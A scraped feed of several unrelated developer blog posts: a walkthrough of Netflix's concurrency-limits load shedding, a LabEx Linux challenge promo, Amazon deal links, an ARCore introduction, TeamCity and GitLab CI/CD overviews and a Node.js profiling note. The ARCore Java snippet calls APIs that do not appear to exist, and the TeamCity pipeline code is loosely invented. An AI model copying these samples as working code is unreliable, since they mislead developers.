[https://www.ridgerun.com/video-based-ai](https://www.ridgerun.com/video-based-ai) [8] - [https://www.analyticsvidhya.com/blog/2023/04/machine-learning-for-social-media/](https://www.analyticsvidhya.com/blog/2023/04/machine-learning-for-social-media/) [9] - [https://divvyhq.com/content-automation/machine-learning-in-content-marketing/](https://divvyhq.com/content-automation/machine-learning-in-content-marketing/) [10] - [https://shlomo-berkovsky.github.io/files/pdf/CIKM15.pdf](https://shlomo-berkovsky.github.io/files/pdf/CIKM15.pdf) [11] - [https://kala-shagun.medium.com/youtube-virality-prediction-using-bert-and-catboost-ensemble-86e90c334921](https://kala-shagun.medium.com/youtube-virality-prediction-using-bert-and-catboost-ensemble-86e90c334921) [12] - [https://www.obviously.ai/post/data-cleaning-in-machine-learning](https://www.obviously.ai/post/data-cleaning-in-machine-learning) [13] - [https://www.v7labs.com/blog/data-cleaning-guide](https://www.v7labs.com/blog/data-cleaning-guide) [14] - [https://arxiv.org/pdf/2111.02452](https://arxiv.org/pdf/2111.02452) [15] - [https://www.ncbi.nlm.nih.gov/pmc/articles/PMC9904219/](https://www.ncbi.nlm.nih.gov/pmc/articles/PMC9904219/) [16] - [https://fastercapital.com/topics/how-to-avoid-common-pitfalls-and-mistakes-with-video-ads.html](https://fastercapital.com/topics/how-to-avoid-common-pitfalls-and-mistakes-with-video-ads.html) [17] - [https://www.ncbi.nlm.nih.gov/pmc/articles/PMC8459865/](https://www.ncbi.nlm.nih.gov/pmc/articles/PMC8459865/) [18] - 
[https://www.analyticsvidhya.com/blog/2015/12/improve-machine-learning-results/](https://www.analyticsvidhya.com/blog/2015/12/improve-machine-learning-results/) [19] - [https://www.geeksforgeeks.org/hyperparameter-tuning/](https://www.geeksforgeeks.org/hyperparameter-tuning/) [20] - [https://www.mdpi.com/2079-9292/10/23/2962](https://www.mdpi.com/2079-9292/10/23/2962) [21] - [https://www.researchgate.net/publication/356595714_Optimizing_Prediction_of_YouTube_Video_Popularity_Using_XGBoost](https://www.researchgate.net/publication/356595714_Optimizing_Prediction_of_YouTube_Video_Popularity_Using_XGBoost) [22] - [https://neptune.ai/blog/deploying-computer-vision-models](https://neptune.ai/blog/deploying-computer-vision-models) [23] - [https://www.fiddler.ai/model-monitoring-tools/how-do-you-maintain-a-deployed-model](https://www.fiddler.ai/model-monitoring-tools/how-do-you-maintain-a-deployed-model) [24] - [https://www.reddit.com/r/mlops/comments/15z3bfo/model_performance_in_production/](https://www.reddit.com/r/mlops/comments/15z3bfo/model_performance_in_production/) [25] - [https://www.sigmoid.com/blogs/5-best-practices-for-deploying-ml-models-in-production/](https://www.sigmoid.com/blogs/5-best-practices-for-deploying-ml-models-in-production/)
victoramit
1,904,888
How to Ensure High Priority for Main Service Traffic - Learning from Netflix's Established Practices
Scenario In the following Netflix tech blog, they propose a scenario and solution where...
0
2024-07-05T00:45:58
https://dev.to/bochaoli95/how-to-ensure-high-priority-for-main-service-traffic-learning-from-netflixs-established-practices-4bl1
## Scenario In the following Netflix tech blog, they propose a scenario and solution where traffic is allocated based on service priority. By shedding non-core functionality traffic, they ensure that resources are dedicated to the main process. [Enhancing Netflix Reliability with Service-Level Prioritized Load Shedding](https://netflixtechblog.com/enhancing-netflix-reliability-with-service-level-prioritized-load-shedding-e735e6ce8f7d) Let's take an example of an online shopping mall. Placing an order is our **core functionality**. While users are browsing products, preloading product information to achieve faster response times **is relatively less important**. If this interface is unavailable, it will only result in slightly longer wait times when clicking on product details (e.g., increasing from 20ms to 150ms), but it will not affect the main shopping process. In the current microservices architecture context, a common solution is to split services and deploy instances for the order service and instances for the product information preloading service separately. However, this approach increases the **overall complexity of the services and raises operational costs**. Additionally, splitting traffic at the gateway level incurs some performance overhead. Using product information loading as an example, preloading is a non-core function, but loading product information itself is a core function of shopping. If we want to implement microservices splitting, we must divide the product information service into two sets of instances. This approach could lead to each module being split into two sets of services: core and non-core. Combining all non-core functions into one service does not align with microservices principles. ## Solution In this article, a sharding mechanism within an instance was implemented using the open-source [Netflix/concurrency-limits](https://github.com/Netflix/concurrency-limits) Java library. The usage of this open-source component is very simple. The core idea is that requests at different levels carry different header values, and the data is sharded according to these header values in a custom interceptor. The core code is as follows: ``` Filter filter = new ConcurrencyLimitServletFilter( new ServletLimiterBuilder() .named("playapi") .partitionByHeader("X-Netflix.Request-Name") .partition("user-initiated", 1.0) .partition("pre-fetch", 0.0) .build()); ``` This effectively implements the sharding functionality, prioritizing high-priority requests. When resources are constrained, low-priority requests will be rejected. Of course, to write code more elegantly, you can also use the predefined methods. The component has already enumerated several levels such as CRITICAL, DEGRADED, BEST_EFFORT, and BULK. We just need to ensure that the corresponding headers are set in the request. In this article, there is a detailed description of resource usage, the selection of resource exhaustion metrics, and the thresholds for these metrics. For instance, for CPU-intensive applications, more attention should be paid to CPU usage, whereas for IO-intensive applications, focusing on IO response time ensures that core IO operations are not affected by lower-priority IO. ##Source Code Analysis In fact, in the work process, introducing a component and making it run, meet requirements, and pass tests is not very difficult. However, during this process, many edge cases require a deep understanding of the source code. 
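Before digging into the internals, it is worth noting what the calling side looks like: a client only needs to tag each request with the partition header used in the filter configuration above. The sketch below uses the JDK's built-in `java.net.http.HttpClient`; the URL is a placeholder, and only the header name and the `user-initiated`/`pre-fetch` values come from the configuration shown earlier.

```
// Hedged sketch: tagging outgoing requests with a priority partition header
// so the ConcurrencyLimitServletFilter on the server can shed low-priority load.
import java.net.URI;
import java.net.http.HttpClient;
import java.net.http.HttpRequest;
import java.net.http.HttpResponse;

public class PriorityClientExample {
    public static void main(String[] args) throws Exception {
        HttpClient client = HttpClient.newHttpClient();

        // A user-facing call: partitioned as "user-initiated" (100% share).
        HttpRequest userInitiated = HttpRequest.newBuilder()
                .uri(URI.create("http://localhost:8080/playapi/item/42")) // placeholder URL
                .header("X-Netflix.Request-Name", "user-initiated")
                .GET()
                .build();

        // A background prefetch: partitioned as "pre-fetch" (0% share), shed first under load.
        HttpRequest preFetch = HttpRequest.newBuilder()
                .uri(URI.create("http://localhost:8080/playapi/item/42")) // placeholder URL
                .header("X-Netflix.Request-Name", "pre-fetch")
                .GET()
                .build();

        HttpResponse<String> ok = client.send(userInitiated, HttpResponse.BodyHandlers.ofString());
        HttpResponse<String> maybeShed = client.send(preFetch, HttpResponse.BodyHandlers.ofString());
        // Under pressure the pre-fetch call may come back as 429: it was shed, and the
        // caller can skip it or retry later without affecting the main flow.
        System.out.println(ok.statusCode() + " / " + maybeShed.statusCode());
    }
}
```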
Let's briefly analyze why this Filter can achieve such functionality and ensure the main service's operation.

The ConcurrencyLimitServletFilter class inherits from javax.servlet.Filter, which is the most general filter. This is easy to understand and reduces our learning curve. It then uses the builder pattern, calling ServletLimiterBuilder to generate a well-assembled ServletLimiter. In this process, we need to set the required key and value.

In the overridden method of this filter, we can see the following code: `limiter.acquire((HttpServletRequest) request);` This is the core of the decision-making process, determining whether the request can be accepted. If it cannot, it will return a **429** status code.

```
@Override
public void doFilter(ServletRequest request, ServletResponse response, FilterChain chain) throws IOException, ServletException {
    Optional<Limiter.Listener> listener = limiter.acquire((HttpServletRequest)request);
    if (listener.isPresent()) {
        try {
            chain.doFilter(request, response);
            listener.get().onSuccess();
        } catch (Exception e) {
            listener.get().onIgnore();
            throw e;
        }
    } else {
        outputThrottleError((HttpServletResponse)response);
    }
}
```

The acquire method is defined in the Limiter interface. Its function is to determine **whether a token can be retrieved** from the token bucket. Because we included partitions in the build process, an AbstractPartitionedLimiter is created for sharding. Next, let's analyze the source code of the core acquire method.

```
@Override
public Optional<Listener> acquire(ContextT context) {
    // Resolve the partition based on the context
    final Partition partition = resolvePartition(context);
    try {
        // Acquire the reentrant lock to ensure thread-safe access to shared resources
        lock.lock();
        // Check if the request should bypass the rate limiting
        if (shouldBypass(context)) {
            return createBypassListener(); // Return a bypass listener
        }
        // Check if the current inflight requests have reached the global limit and if the partition's limit is exceeded
        if (getInflight() >= getLimit() && partition.isLimitExceeded()) {
            lock.unlock(); // Release the lock before handling rejection
            // If a backoff delay is configured and the number of delayed threads is below the maximum allowed, introduce a delay
            if (partition.backoffMillis > 0 && delayedThreads.get() < maxDelayedThreads) {
                try {
                    delayedThreads.incrementAndGet(); // Increment the count of delayed threads
                    TimeUnit.MILLISECONDS.sleep(partition.backoffMillis); // Introduce the delay
                } catch (InterruptedException e) {
                    Thread.currentThread().interrupt(); // Restore the interrupted status
                } finally {
                    delayedThreads.decrementAndGet(); // Decrement the count of delayed threads
                }
            }
            return createRejectedListener(); // Return a rejected listener
        }
        // Record the request in the partition's busy count
        partition.acquire();
        return Optional.of(createListener());
    } finally {
        if (lock.isHeldByCurrentThread()) lock.unlock(); // Ensure the lock is released if held by the current thread
    }
}
```

The source code mainly consists of several steps:

1. It retrieves the partition information for the request.
2. To ensure concurrency safety, it uses a reentrant lock in Java.
3. The core logic is to check `getInflight() >= getLimit() && partition.isLimitExceeded()`. `getInflight() < getLimit()` indicates that the current number of concurrent requests is less than the limit, allowing more requests to enter. The getLimit() method is the core token acquisition algorithm of the entire component.
This limit is updated by continuously sampling the system's condition. In other words, when our request volume is very high, this sampling detects the pressure on the system and informs the requesting threads that no more requests can be supported.

So, how are different levels of requests implemented? This is determined by partition.isLimitExceeded(). Each partition has its own busy and limit parameters, and the check is performed as follows:

```
boolean isLimitExceeded() {
    return busy >= limit;
}
```

The key lies in how the limit is calculated:

```
this.limit = (int)Math.max(1, Math.ceil(totalLimit * percent));
```

In this way, based on the percentage we set, less important requests are more likely to trigger the isLimitExceeded() condition and thus be restricted. So the overall logic is that as long as the requests do not exceed the overall limit, **all requests will be allowed**. However, if there is a resource shortage, since we have set the pass rate for important requests to 100% and non-important requests to 0%, **all the requests that pass will be important requests**. In this way, we achieve our goal.

## Summary

By understanding Netflix's rate limiting open-source component, we now have the capability to prioritize high-priority requests and restrict low-priority requests within the same instance when resources are tight. Configuring these parameters is very simple, and we can also adjust them so that a small share of low-priority requests still gets through, for example by giving that partition a weight of 0.1.

Afterward, I will frequently update my interpretations of technical articles from major companies and combine them with practical experience or source code analysis. Please follow me, and thank you.
bochaoli95
1,912,104
Embark on a Linux Adventure: Challenges That Elevate Your Skills 🚀
The article is about an exciting collection of nine Linux-themed challenges that transport readers to captivating virtual realms and push their technical skills to new heights. From discovering one's Linux identity to exploring virtual reality shell environments, the challenges cover a diverse range of topics, including file management, permissions, text editing, shell scripting, and more. Each challenge is designed to immerse readers in a unique narrative, blending problem-solving with engaging storytelling. The article provides a concise overview of the challenges, highlighting their key themes and inviting readers to embark on these Linux adventures to elevate their digital expertise. With links to the individual challenges, the article promises an unforgettable journey of self-discovery, innovation, and mastery within the vast Linux ecosystem.
27,674
2024-07-05T00:42:11
https://dev.to/labex/embark-on-a-linux-adventure-challenges-that-elevate-your-skills-50e9
linux, coding, programming, tutorial
![MindMap](https://internal-api-drive-stream.feishu.cn/space/api/box/stream/download/authcode/?code=ZDI0MzRlOTA3YTFhYTE2OTBlZDc0NDZkYjNhYjMwYzJfY2M1YzQyY2ZjZjdhMGUxNmI5Mzk4MGE3NDFmYmY1YjBfSUQ6NzM4Nzk0NTUzMjI1MTIwOTczMl8xNzIwMTQwMTMwOjE3MjAyMjY1MzBfVjM) Welcome to an exhilarating collection of Linux-themed challenges that will transport you to captivating virtual realms and push your technical prowess to new heights! 🌟 Whether you're a seasoned Linux enthusiast or a curious newcomer, these immersive experiences will guide you through a journey of self-discovery, problem-solving, and digital mastery. ## Discovering Your Linux Identity 👤 Imagine yourself as a cosmic philosopher, standing beneath a starry sky and pondering your place in the vast Linux universe. In this challenge, you'll use the `whoami` command to reveal your true digital identity and uncover the intricacies of the Linux environment. [Dive in and find your cosmic connection!](https://labex.io/labs/271444) ![Skills Graph](https://pub-a9174e0db46b4ca9bcddfa593141f230.r2.dev/discovering-your-linux-identity-271444.jpg) ## Interstellar File Fusion with Linux 🌌 Welcome to Sci-Astra City, a utopian hub of technological innovation where you, as an esteemed interstellar diplomatic envoy, must use your Linux file-joining prowess to piece together fragmented historical archives. Forge harmonious relationships with alien species by decoding and uniting their digital legacies. [Embark on this interstellar file fusion adventure!](https://labex.io/labs/271312) ## Virtual Reality Shell Exploration 🎮 Immerse yourself in a futuristic virtual reality world where creativity and technology collide. As a digital artist, harness the power of the Linux shell to create dynamic and interactive experiences within this captivating realm. [Unlock the secrets of the virtual reality shell!](https://labex.io/labs/271276) ## The Sanctum of Permissions 🕌 In the mythical kingdom of Indraprastha, a sacred temple of knowledge holds ancient secrets. As a chosen one, decipher the cryptic commands and maintain the sanctity of the temple, restoring order to the land. Explore the intricacies of permissions in this Linux challenge. [Unravel the mysteries of the Sanctum!](https://labex.io/labs/271240) ## Enchanting Linux Text Editing Adventure 📜 Immerse yourself in the enchanting Lake of Mystique, where you, a biologist, must document your findings on the unique creatures residing within. Harness the power of the Vim text editor in a Linux environment to streamline your research. [Embark on this captivating text editing quest!](https://labex.io/labs/271428) ## Reverse Number Using Shell Script 🔢 In this challenge, you'll learn how to use command-line arguments, arithmetic operations, and loops in shell script to reverse a given number. Dive into the intricacies of shell scripting and uncover the secrets of number manipulation. [Unlock the power of shell script reversals!](https://labex.io/labs/18291) ## Right Angle Triangle Pattern 🔺 Explore the world of shell script loops and patterns as you create a right-angled triangle using user input. This challenge will deepen your understanding of loop structures and their application in bash scripting. [Construct the perfect triangle with Linux!](https://labex.io/labs/18289) ## Bash Script Lucky Number Checker 🍀 Delve into the world of Bash, a powerful Unix shell and command language. In this challenge, you'll learn how to use the `else if` statement to create a script that checks if a number is lucky. 
Enhance your Bash scripting skills and unlock new possibilities. [Discover your lucky number with Linux!](https://labex.io/labs/211457) ## Virtual Linux Listing Adventure 💻 Step into a virtual reality game where you, as a VR Experience Designer, challenge players to master the art of content listing on the Linux command line. Navigate the virtual file system and uncover the secrets of digital mastery. [Embark on this virtual Linux listing quest!](https://labex.io/labs/271326) Embrace the thrill of these Linux-powered challenges and elevate your skills to new heights! 🚀 Each experience promises to transport you to captivating virtual realms, where you'll solve problems, explore new technologies, and unlock the true potential of the Linux ecosystem. 🌟 Get ready to embark on an unforgettable adventure! --- ## Want to learn more? - 🌳 Learn the latest [Linux Skill Trees](https://labex.io/skilltrees/linux) - 📖 Read More [Linux Tutorials](https://labex.io/tutorials/category/linux) - 🚀 Practice thousands of programming labs on [LabEx](https://labex.io) Join our [Discord](https://discord.gg/J6k3u69nU6) or tweet us [@WeAreLabEx](https://twitter.com/WeAreLabEx) ! 😄
labby
1,912,102
Can't Miss: Sniping the Best 4th of July Deals for Developers on Amazon
As developers, we know how important it is to stay ahead of the game, especially when it comes to...
0
2024-07-05T00:35:09
https://dev.to/3a5abi/cant-miss-sniping-the-best-4th-of-july-deals-for-developers-on-amazon-26l4
news, devtoys, developer
As developers, we know how important it is to stay ahead of the game, especially when it comes to snagging the best tech deals. This 4th of July, Amazon is offering some unmissable lightning deals on a range of products perfect for enhancing your workspace and boosting your productivity. Check out these curated blog posts to find the top deals on mini computers, monitors, laptops, and accessories. Act fast—these deals are as hot as the summer sun and won’t last long! ![mini pcs](https://dev-to-uploads.s3.amazonaws.com/uploads/articles/i8m1chqbmw1vj2n5smd8.png) ## [1. **Unmissable 4th of July Mini PC Lightning Deals on Amazon**](https://devtoys.io/2024/07/04/unmissable-4th-of-july-mini-pc-lightning-deals-on-amazon/) Upgrade your setup with these incredible deals on mini computers. Perfect for creating a powerful, space-saving workstation. [⚡Read more](https://devtoys.io/2024/07/04/unmissable-4th-of-july-mini-pc-lightning-deals-on-amazon/) --- ![laptops](https://dev-to-uploads.s3.amazonaws.com/uploads/articles/6janxxzq3miqwt36b4w5.png) ## [2. **Incredible 4th of July Laptop Lightning Deals on Amazon**](https://devtoys.io/2024/07/04/incredible-4th-of-july-laptop-lightning-deals-on-amazon/) Discover amazing discounts on high-performance laptops that are ideal for coding, gaming, or everyday use. [⚡Read more](https://devtoys.io/2024/07/04/incredible-4th-of-july-laptop-lightning-deals-on-amazon/) --- ![accessories](https://dev-to-uploads.s3.amazonaws.com/uploads/articles/e8yv5ktl3bjm7i1vt44m.png) ## [3. **Hot 4th of July Accessory Deals You Can't Miss on Amazon**](https://devtoys.io/2024/07/04/hot-4th-of-july-accessory-deals-you-cant-miss-on-amazon/) From SSDs to gaming headsets, find the best deals on peripherals and accessories to complete your tech arsenal. [⚡Read more](https://devtoys.io/2024/07/04/hot-4th-of-july-accessory-deals-you-cant-miss-on-amazon/) --- ![monitors](https://dev-to-uploads.s3.amazonaws.com/uploads/articles/rquzzfnfp2y2xe2jx21s.png) ## [4. **Unbeatable 4th of July Lightning Deals on Amazon for Monitors**](https://devtoys.io/2024/07/04/unbeatable-4th-of-july-lightning-deals-on-amazon-for-monitors/) Elevate your visual experience with top-rated monitors available at unbeatable prices. Perfect for coding, gaming, and entertainment. [⚡Read more](https://devtoys.io/2024/07/04/unbeatable-4th-of-july-lightning-deals-on-amazon-for-monitors/) --- Stay tuned and act quickly to make the most of these fantastic deals. Sniping these offers will ensure you have the best gear to enhance your development workflow and enjoy the ultimate tech experience this summer. Don't miss out—grab these deals before they’re gone!
3a5abi
1,912,058
Air Bird Selling Website and Juice Selling Website
A post by Uzair Rai
0
2024-07-05T00:09:56
https://dev.to/uzair_rai12/air-bird-selling-website-and-juice-selling-website-55p5
wordpress, webdev
uzair_rai12
1,912,103
Developing Augmented Reality Experiences with ARCore
Introduction Augmented Reality (AR) is a technology that allows for the incorporation of...
0
2024-07-05T00:32:53
https://dev.to/kartikmehta8/developing-augmented-reality-experiences-with-arcore-3301
javascript, beginners, programming, tutorial
## Introduction Augmented Reality (AR) is a technology that allows for the incorporation of virtual elements into the user's real-world environment. With the rise of smartphones and tablets, AR has become widely accessible to the masses. One of the most popular platforms for developing AR experiences is ARCore, which is an easy-to-use software development kit (SDK) created by Google. In this article, we will explore the advantages and disadvantages of using ARCore for developing augmented reality experiences. ## Advantages of ARCore 1. **Easy to Use:** ARCore's user-friendly interface makes it easy for developers to create AR experiences without extensive coding knowledge. 2. **Cross-Platform Compatibility:** ARCore is compatible with both Android and iOS devices, making it accessible to a wider audience. 3. **Powerful Tracking Technology:** ARCore utilizes advanced tracking technology to accurately map the user's surroundings, resulting in a more immersive experience. 4. **Support for Various Devices:** ARCore supports a wide range of devices, from high-end smartphones to budget-friendly devices, ensuring that a larger audience can access the AR experience. ## Disadvantages of ARCore 1. **Limited AR Features:** Unlike other AR development platforms, ARCore has limited features, which can restrict the creativity of developers. 2. **Device Compatibility:** ARCore is not compatible with all devices, which can be a limiting factor for users. ## Features of ARCore 1. **Motion Tracking:** ARCore uses the device's camera to track the user's movements, allowing for a more interactive experience. 2. **Environmental Understanding:** ARCore can detect the size, shape, and position of surfaces in the user's environment, making 3D AR objects appear more realistic. 3. **Cloud Anchors:** ARCore's Cloud Anchors feature allows for shared AR experiences between multiple users. ### Example of ARCore in Action ```java // Sample code for basic ARCore setup void createSession() { try { session = new Session(context); } catch (UnavailableException e) { // Handle exceptions } } void configureSession() { Config config = new Config(session); config.setUpdateMode(Config.UpdateMode.LATEST_CAMERA_IMAGE); session.configure(config); } // This function sets up an AR anchor void addAnchor() { Frame frame = session.update(); Point cloudPoint = frame.getHitTest().get(0).getPoint(); Anchor anchor = session.createAnchor(cloudPoint); } ``` This snippet demonstrates basic setup, configuration, and use of anchors in an ARCore application, showcasing how developers can start integrating AR features into their applications. ## Conclusion In conclusion, ARCore is a powerful and user-friendly platform for developing AR experiences. Its compatibility with various devices, easy-to-use interface, and advanced tracking technology make it a popular choice among developers. However, its limited features and device compatibility can be seen as disadvantages. Overall, ARCore is a great tool for those looking to create immersive and interactive augmented reality experiences. With the continuous advancements in technology, we can expect to see even more exciting features from ARCore in the future.
kartikmehta8
1,912,101
# Comparative Analysis of Testing Management Tools: TeamCity
Teacher: Mag. Patrick Cuadros Quiroga Member: Lupaca Mamani, Ronal Daniel ...
0
2024-07-05T00:24:47
https://dev.to/ronal_daniellupacamaman/-comparative-analysis-of-testing-management-tools-teamcity-1a5p
## Teacher: Mag. Patrick Cuadros Quiroga ## Member: Lupaca Mamani, Ronal Daniel ### INTRODUCTION In today’s software development environment, ensuring the quality and functionality of applications is paramount. Continuous Integration (CI) and Continuous Delivery (CD) tools play a crucial role in automating development and deployment processes. TeamCity, developed by JetBrains, is one of the most popular and widely adopted CI/CD tools in the industry. This article will explore TeamCity’s functionalities, showcasing how it can be effectively used for testing management and code comparison. ### BODY #### What is TeamCity? TeamCity is a powerful CI/CD server designed to automate the build, test, and release processes, ensuring the smooth delivery of high-quality software. Since its initial release in 2006, TeamCity has become a favorite among developers for its robust features and user-friendly interface. #### Key Features of TeamCity: 1. **Extensibility**: TeamCity supports a wide range of plugins, allowing integration with various tools and platforms. 2. **Build Pipelines**: It allows defining complex build pipelines, providing flexibility in automating workflows. 3. **Scalability**: TeamCity can handle projects of any size, from small startups to large enterprises. 4. **Comprehensive VCS Integration**: It integrates seamlessly with multiple version control systems, including Git, Subversion, and Mercurial. 5. **Real-time Feedback**: Provides immediate feedback on build status, helping teams to quickly identify and address issues. #### Advantages of TeamCity: 1. **Customizable Build Configurations**: Its build configuration system is highly flexible, supporting various environments and platforms. 2. **Strong Community Support**: A vibrant community provides plugins, updates, and support. 3. **Detailed Reporting**: Offers extensive reporting features that help track the build process and quality metrics. #### Disadvantages of TeamCity: 1. **Resource Intensive**: Requires substantial server resources to run efficiently. 2. **Learning Curve**: May be complex for new users to configure and manage. 3. **Maintenance Overhead**: Requires regular maintenance to manage updates and ensure security. ### Managing Tests with TeamCity TeamCity provides a robust environment for managing automated tests, from execution to result visualization. Here’s how TeamCity can be used effectively in a real-world scenario: 1. **Configuration of Projects and Builds**: - **Creating a Project**: When starting a new project in TeamCity, you can define specific build configurations for different environments, which allows you to tailor your CI/CD pipeline to meet project-specific needs. - **Build Steps**: Add build steps that include running unit, integration, and functional tests. Tools like JUnit, NUnit, or TestNG can be easily integrated into TeamCity's build process. 2. **Integration with Testing Tools**: - **JUnit**: TeamCity can execute JUnit tests as part of your CI/CD pipeline, collecting and presenting results in its interface for easy review. - **Selenium**: Integrate Selenium for automated functional testing. TeamCity can run these tests across various browsers, reporting results in real-time. 3. **Reporting Results**: - **Dashboards and Test Views**: Test results are displayed on detailed dashboards, including graphs and statistics that help visualize the state and quality of the code efficiently. 
- **Notifications**: Configure notifications in TeamCity to alert developers of test failures, ensuring a quick and proactive response to identified issues. ### Code Comparison in TeamCity Code comparison is essential to maintain software quality and consistency. TeamCity offers advanced functionalities to facilitate this process: 1. **Integration with Version Control Systems (VCS)**: - **Git, Mercurial, Subversion**: TeamCity integrates seamlessly with popular version control systems, allowing code comparison and merging directly from its interface. - **Branching and Merging**: TeamCity supports advanced branching and merging strategies, helping teams manage and review code changes efficiently. This is particularly useful in large projects with multiple developers working in parallel. 2. **Code Inspection**: - **Static Code Analysis**: Integrating static code analysis tools in TeamCity helps identify potential issues in the code before they reach production. This includes error detection, coding best practices, and security issues. - **Pull Requests**: Configure builds to run automatically when a pull request is created, ensuring all proposed changes are validated before merging. TeamCity's code review functionalities allow comparison of changes and ensure quality before final integration. ### Real-World Example Below is a practical example of a TeamCity pipeline for managing tests and performing code comparisons. This pipeline sets up the environment, runs tests, simulates a code review, and archives the results. #### Example Pipeline **Setting Up JDK and Running Unit Tests with JUnit** This pipeline sets up the environment with JDK 17, runs unit tests using JUnit, and archives the test results. 1. **Environment Setup and Unit Tests**: ```groovy project { name = "Example Project" buildType { name = "Build and Test" vcs { root(DslContext.settingsRoot) } steps { script { name = "Setup JDK" scriptContent = """ export JAVA_HOME=/usr/lib/jvm/java-17-openjdk export PATH=$JAVA_HOME/bin:$PATH java -version """ } script { name = "Run Unit Tests" scriptContent = """ ./gradlew test """ } } features { junit { includePattern = "**/build/test-results/test/*.xml" } } } } ``` #### Explanation: Environment Setup: Configures JDK 17 in the TeamCity environment. Running Unit Tests: Executes unit tests using Gradle. Reporting Results: Configures TeamCity to collect and display JUnit test results. Simulating Test Results and Archiving Results: ```groovy project { name = "Example Project" buildType { name = "Build and Test" vcs { root(DslContext.settingsRoot) } steps { script { name = "Setup JDK" scriptContent = """ export JAVA_HOME=/usr/lib/jvm/java-17-openjdk export PATH=$JAVA_HOME/bin:$PATH java -version """ } script { name = "Run Unit Tests" scriptContent = """ ./gradlew test """ } script { name = "Simulate Test Results" scriptContent = """ echo "Test Results: All tests passed!" > test-results.txt tar -czf test-results.tar.gz test-results.txt """ } } artifacts { artifactRules = "test-results.tar.gz" } features { junit { includePattern = "**/build/test-results/test/*.xml" } } } } ``` ####Explanation: Simulating Test Results: Creates a file with the test results and compresses it. Archiving Results: Configures TeamCity to archive the test results. ##CONCLUSION TeamCity is a powerful and versatile tool that not only facilitates continuous integration and delivery but also provides essential functionalities for test management and code comparison. 
Its ability to integrate with version control systems and testing tools makes it an ideal choice for development teams aiming to maintain high standards of quality and efficiency in their projects.
ronal_daniellupacamaman
1,912,100
GitLab Pipelines: Streamlining Continuous Integration and Continuous Deployment
Introduction In the modern software development landscape, continuous integration (CI) and continuous...
0
2024-07-05T00:23:32
https://dev.to/edward_hernnapazamaman/gitlab-pipelines-streamlining-continuous-integration-and-continuous-deployment-10l7
**Introduction** In the modern software development landscape, continuous integration (CI) and continuous deployment (CD) have become essential practices for maintaining code quality and delivering updates efficiently. GitLab Pipelines, a feature of GitLab CI/CD, offers a powerful and flexible solution for automating these processes. In this article, we will explore the capabilities of GitLab Pipelines. ## What are GitLab Pipelines? GitLab Pipelines are automated workflows defined in a file called `.gitlab-ci.yml` located in the root of a GitLab repository. These pipelines consist of one or more stages, each containing jobs that can run sequentially or in parallel. The primary goal of GitLab Pipelines is to automate the testing, building, and deployment of applications, ensuring that each change to the codebase is verified and ready for production. ## Key Features of GitLab Pipelines **1. Ease of Configuration:** The `.gitlab-ci.yml` file is straightforward to configure, allowing developers to define stages, jobs, and conditions for their execution. **2. Scalability:** GitLab Pipelines can handle large and complex workflows, making them suitable for projects of any size. **3. Integration:** Seamlessly integrates with other GitLab features, such as GitLab Runner, GitLab Registry, and third-party services. **4. Parallel Execution:** Jobs within a stage can run concurrently, reducing the overall time required for pipeline completion. **5. Custom Runners:** Supports custom GitLab Runners, enabling flexible and scalable execution environments. ## Example GitLab Pipeline Configuration ![Image description](https://dev-to-uploads.s3.amazonaws.com/uploads/articles/p42weq2pj0cbwly1oxcg.png) **Explanation** **Stages:** The pipeline is divided into three stages: build, test, and deploy. **Variables:** Environment variables can be defined globally. **Cache:** The node_modules directory is cached to speed up subsequent pipeline runs. **before_script:** Commands that run before each job, in this case, npm install to install dependencies. **Jobs:** Each stage has a corresponding job with specific scripts to execute. The deploy job runs only when changes are pushed to the master branch. **Conclusion** GitLab Pipelines offer a robust and versatile solution for implementing CI/CD in any software development project. By automating the build, test, and deployment processes, they help ensure code quality and accelerate the delivery of new features. With its ease of configuration, scalability, and integration capabilities, GitLab Pipelines stand out as a top choice for development teams aiming to streamline their workflows and enhance productivity.
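Since the example configuration above is shown as an image, here is a hedged sketch of a `.gitlab-ci.yml` that matches the explanation: three stages, a globally defined variable, a cached `node_modules` directory, `npm install` in `before_script`, and a deploy job that runs only on the `master` branch. The concrete script commands and the global variable are assumptions for illustration, not the exact file from the original post.

```yaml
# Illustrative .gitlab-ci.yml matching the explanation above (not the exact file
# from the article). The deploy command is a placeholder.
stages:
  - build
  - test
  - deploy

variables:
  NODE_ENV: "test"   # assumed global variable for illustration

cache:
  paths:
    - node_modules/

before_script:
  - npm install

build_job:
  stage: build
  script:
    - npm run build

test_job:
  stage: test
  script:
    - npm test

deploy_job:
  stage: deploy
  script:
    - ./deploy.sh   # placeholder deployment command
  only:
    - master
```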
edward_hernnapazamaman
1,912,060
Profiling Node.js apps with Chrome DevTools profiler
Profiling refers to analyzing and measuring an application's performance characteristics. Profiling...
0
2024-07-05T00:22:44
https://sevic.dev/notes/profiling-nodejs-chrome-devtools-profiler/
node, chromedevtools, profiling
---
title: Profiling Node.js apps with Chrome DevTools profiler
published: true
tags: ['node', 'chromedevtools', 'profiling']
canonical_url: https://sevic.dev/notes/profiling-nodejs-chrome-devtools-profiler/
---

Profiling refers to analyzing and measuring an application's performance characteristics. Profiling helps identify performance bottlenecks in a Node.js app, such as CPU-intensive tasks like cryptographic operations, image processing, or complex calculations. This post covers running a profiler for various Node.js apps in Chrome DevTools.

### Prerequisites

- Google Chrome installed
- Node.js app bootstrapped

### Setup

- Run `node --inspect app.js` to start the debugger.
- Open `chrome://inspect`, click `Open dedicated DevTools for Node` and then navigate to the Performance tab. Start recording.
- Run load testing via the [autocannon](https://www.npmjs.com/package/autocannon) package using the following command format: `npx autocannon <COMMAND>`.
- Stop recording in Chrome DevTools.

### Profiling

On the `Performance` tab in Chrome DevTools, open the `Bottom-Up` subtab to identify which functions consume the most time. Look for potential performance bottlenecks, such as synchronous functions for hashing (`pbkdf2Sync`) or file system operations (`readFileSync`).
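To see what such a bottleneck looks like in practice, you can profile a small app like the sketch below (an assumed example, not taken from the original post); under load, the synchronous `pbkdf2Sync` call should dominate the samples in the `Bottom-Up` view.

```js
// save as app.js and start with: node --inspect app.js
// Hypothetical endpoint whose synchronous hashing shows up as a hot function
// in the Bottom-Up view of the Chrome DevTools profiler.
const http = require('http');
const crypto = require('crypto');

const server = http.createServer((req, res) => {
  // Synchronous, CPU-intensive work that blocks the event loop.
  const hash = crypto.pbkdf2Sync('password', 'salt', 100000, 64, 'sha512');
  res.end(hash.toString('hex'));
});

server.listen(3000, () => {
  console.log('Listening on http://localhost:3000');
});
```

Load it with `npx autocannon http://localhost:3000` while recording, then stop the recording and inspect the `Bottom-Up` tab.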
zsevic
1,912,059
Need help with a project
Hi everyone. I am seeking some help on a project that will hopefully in time save my relationship as...
0
